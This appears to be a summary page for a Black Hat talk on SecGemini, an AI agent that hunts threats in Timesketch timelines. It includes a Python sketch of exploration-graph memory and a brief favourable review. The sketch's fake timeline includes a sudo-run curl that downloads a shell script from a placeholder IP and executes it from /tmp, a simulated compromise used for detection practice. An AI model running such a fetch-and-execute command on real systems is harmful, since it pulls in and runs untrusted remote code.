Autonomous Timeline Analysis and Threat Hunting: An AI Agent for Timesketch

Black Hat USA 2025 · Day 1 · Briefings

Google engineers Maarten van Dantzig and Alex present SecGemini, an AI agent that autonomously performs digital forensics and incident response across hundreds of millions of log records, finding 53% of critical attack indicators in the hinted (timeline reconstruction) mode and 47% in the unhinted (threat hunting) mode, for under $3 per investigation. The agent avoids the context-window limitations of naive LLM approaches by maintaining an "exploration graph" as structured memory, enabling multi-step reasoning across massive datasets without losing track of what it has learned.
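To make the exploration-graph idea concrete, here is an added illustration in Python. It is not code from the talk, from SecGemini or from Timesketch: a deterministic stand-in for the agent loop runs over a constructed timeline (made-up records in a Timesketch-like shape), with a regex pivot extractor playing the part of the LLM's reasoning step. The names `ExplorationGraph`, `run_investigation` and `recall` are this example's own. The point it shows is the one the summary makes: each step receives only the graph's compact context, never the raw timeline, so the memory handed between steps stays bounded while the searched data can grow; the seed pattern stands in for the "hinted" versus "unhinted" modes.

```python
"""Exploration-graph memory for a multi-step timeline investigation (added
example, not the talk's code). No LLM is called; pivoting is rule-based."""
import re
from dataclasses import dataclass, field

# Constructed timeline: a few suspicious events buried in 500 routine cron entries.
TIMELINE = [
    {"ts": "2025-01-10T09:00:01Z", "source": "auth",
     "msg": "sshd: Accepted password for svc_backup from 10.0.0.5"},
    {"ts": "2025-01-10T09:00:07Z", "source": "auth",
     "msg": "sudo: svc_backup : COMMAND=/usr/bin/curl http://198.51.100.7/stage.sh"},
    {"ts": "2025-01-10T09:00:09Z", "source": "proc",
     "msg": "execve /bin/bash /tmp/stage.sh by svc_backup"},
    {"ts": "2025-01-10T09:01:00Z", "source": "net",
     "msg": "outbound 198.51.100.7:443 from host01"},
    {"ts": "2025-01-10T09:02:00Z", "source": "auth",
     "msg": "sshd: Accepted publickey for alice from 10.0.0.9"},
] + [
    {"ts": f"2025-01-10T10:{i % 60:02d}:00Z", "source": "cron", "msg": f"cron: job {i} ok"}
    for i in range(500)
]

IP_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PATH_RX = re.compile(r"/tmp/\S+")


@dataclass
class Node:
    node_id: int
    kind: str      # "query" or "finding"
    summary: str   # short text kept in memory instead of the raw records
    parents: list = field(default_factory=list)


class ExplorationGraph:
    """Structured memory: what was searched, what was found, and what led to it."""

    def __init__(self):
        self.nodes = []

    def add(self, kind, summary, parents=()):
        node = Node(len(self.nodes), kind, summary, list(parents))
        self.nodes.append(node)
        return node.node_id

    def findings(self):
        return [n.summary for n in self.nodes if n.kind == "finding"]

    def context(self):
        """The only input the next reasoning step receives; size is independent
        of the timeline, and the parent links make every finding auditable."""
        return "\n".join(f"[{n.node_id}] {n.kind}: {n.summary} <- {n.parents}"
                         for n in self.nodes)


def query(events, pattern):
    """Stand-in for a Timesketch search: touches the full timeline on demand."""
    rx = re.compile(pattern)
    return [e for e in events if rx.search(e["msg"])]


def extract_pivots(hits):
    """Artifacts worth pivoting on (IPs, /tmp paths), in order of first appearance."""
    pivots = []
    for e in hits:
        for m in IP_RX.findall(e["msg"]) + PATH_RX.findall(e["msg"]):
            if m not in pivots:
                pivots.append(m)
    return pivots


def run_investigation(events, seed_pattern, max_steps=8):
    """Breadth-first pivoting driven by the graph. seed_pattern is the hint: a
    known indicator in hinted mode, a generic suspicious pattern in unhinted mode."""
    graph = ExplorationGraph()
    frontier = [(seed_pattern, None)]
    searched, known = set(), set()
    while frontier and len(searched) < max_steps:
        pattern, parent = frontier.pop(0)
        if pattern in searched:
            continue
        searched.add(pattern)
        hits = query(events, pattern)
        qid = graph.add("query", f"search {pattern!r}: {len(hits)} hits",
                        [] if parent is None else [parent])
        for pivot in extract_pivots(hits):
            if pivot in known:
                continue
            known.add(pivot)
            fid = graph.add("finding", pivot, [qid])
            frontier.append((re.escape(pivot), fid))   # pivot becomes the next query
    return graph


def recall(graph, critical_indicators):
    """Fraction of the critical indicators that ended up as findings."""
    return len(set(graph.findings()) & set(critical_indicators)) / len(critical_indicators)


if __name__ == "__main__":
    critical = ["10.0.0.5", "198.51.100.7", "/tmp/stage.sh", "host01"]  # constructed
    hinted = run_investigation(TIMELINE, r"svc_backup")
    print(hinted.context())
    print("hinted recall:", recall(hinted, critical))
    print("unhinted recall:", recall(run_investigation(TIMELINE, r"curl|/tmp/"), critical))
```

Running it shows the two properties the talk's design is built around: the context string never mentions the 500 cron records even though every query scans them, and the hinted run (seeded with the compromised account) scores higher recall than the unhinted hunt seeded with a generic pattern, which is the same direction as the talk's 53% versus 47%. In a real deployment the pivot extractor and query choice would be the model's job; the graph is what keeps that reasoning bounded and reviewable.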

AI review

The exploration graph is the right architectural answer to the context-window problem in DFIR — externalized structured memory that lets the LLM process one step at a time without degradation. 53% recall on critical indicators at under three dollars a case isn't perfect, but it's operationally real, and the auditability design shows these people understand what actual analysts need.
